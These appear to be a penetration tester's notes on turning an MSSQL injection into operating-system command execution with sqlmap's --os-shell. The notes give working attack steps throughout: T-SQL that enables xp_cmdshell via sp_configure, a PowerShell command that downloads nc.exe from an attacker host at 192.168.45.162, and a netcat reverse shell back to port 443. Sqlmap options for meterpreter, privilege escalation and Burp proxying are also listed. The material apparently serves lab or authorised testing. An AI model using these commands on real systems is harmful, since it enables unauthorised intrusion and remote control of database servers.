SQLMap

SQLMap gives easy MSSQL code exec on an injection point found in a web app. Under the hood --os-shell enables xp_cmdshell through sp_configure and runs commands with it, so the injected DB login must be sysadmin (or escalate to it) and the injection must allow stacked queries.

sqlmap -r inject.txt --os-shell

(where inject.txt is the raw HTTP request, e.g. saved from Burp, containing the vulnerable POST parameter)

Other options for exec (from sqlmap --help):

    Operating system access:
    These options can be used to access the back-end database management
    system underlying operating system
    --os-cmd=OSCMD      Execute an operating system command
    --os-shell          Prompt for an interactive operating system shell
    --os-pwn            Prompt for an out-of-band shell, meterpreter or VNC
    --os-smbrelay       One click prompt for an OOB shell, meterpreter or VNC
    --os-bof            Stored procedure buffer overflow exploitation
    --priv-esc          Database process' user privilege escalation
    --msf-path=MSFPATH  Local path where Metasploit Framework is installed
    --tmp-path=TMPPATH  Remote absolute path of temporary files directory

If the shell misbehaves (stale detection data or a half-finished earlier run), add --flush-session so sqlmap discards the stored session for the target and re-detects from scratch.

Simple Rev Shell

(typed at the os-shell> prompt; nc.exe is served from the attacker box at 192.168.45.162, with a listener on port 443)

powershell.exe wget http://192.168.45.162/nc.exe -OutFile c:\Windows\Tasks\nc.exe
c:\Windows\Tasks\nc.exe -e cmd.exe 192.168.45.162 443
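As an added example (not part of the original notes), this is what --os-shell does by hand on MSSQL, followed by the same reverse-shell launch as above. It assumes the injected login can issue stacked T-SQL (through the injection point itself or sqlmap's --sql-shell) and reuses the attacker address and port from the notes.

```sql
-- Added example, not from the original notes: manual equivalent of sqlmap --os-shell on MSSQL.
-- Assumption: we can run stacked T-SQL as the login the web app connects with.

-- 1. Precondition check. xp_cmdshell needs the sysadmin fixed server role
--    (IS_SRVROLEMEMBER returns 1 = member, 0 = not a member, NULL = role/login unknown).
--    If this is 0, sp_configure below fails and so does --os-shell; that is the case --priv-esc targets.
SELECT SYSTEM_USER AS login_name,
       IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;

-- 2. Is xp_cmdshell already enabled? value_in_use = 1 means yes and steps 3 can be skipped.
SELECT name, value_in_use
FROM sys.configurations
WHERE name = 'xp_cmdshell';

-- 3. Enable it. This is the sp_configure sequence sqlmap issues for you.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

-- 4. Execute a command. Output comes back as a result set, one row per output line
--    (sqlmap captures this into a temp table and reads it back through the injection).
EXEC master..xp_cmdshell 'whoami';

-- 5. Stage and launch the reverse shell from the notes (attacker 192.168.45.162, listener on 443).
--    xp_cmdshell blocks until the spawned process exits, so the second call hangs
--    for as long as the shell is alive; run it last.
EXEC master..xp_cmdshell 'powershell.exe wget http://192.168.45.162/nc.exe -OutFile c:\Windows\Tasks\nc.exe';
EXEC master..xp_cmdshell 'c:\Windows\Tasks\nc.exe -e cmd.exe 192.168.45.162 443';
```

Running step 1 first is the quick way to tell whether --os-shell can work at all before spending time on it.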

Proxy through Burp + other syntax

Right-click the request in Burp -> Copy to file (e.g. request_from_burp), then pass it to sqlmap with -r request_from_burp.

--proxy=http://127.0.0.1:8080: route every sqlmap request through Burp so each payload shows up in the Proxy history.

--force-ssl: a saved request file carries no scheme, so sqlmap assumes HTTP unless the Host port is 443; add this when the target is HTTPS (it is the target, not Burp, that makes it necessary).

--dbms=mssql: name the backend when it is already known and skip fingerprinting.

--level=N (1-5, default 1) / --risk=N (1-3, default 1): level widens where payloads are injected (level 2 adds cookies, level 3 adds User-Agent/Referer headers); risk allows more aggressive payloads (risk 2 adds heavy time-based queries, risk 3 adds OR-based tests that can alter data if the injection sits in an UPDATE).
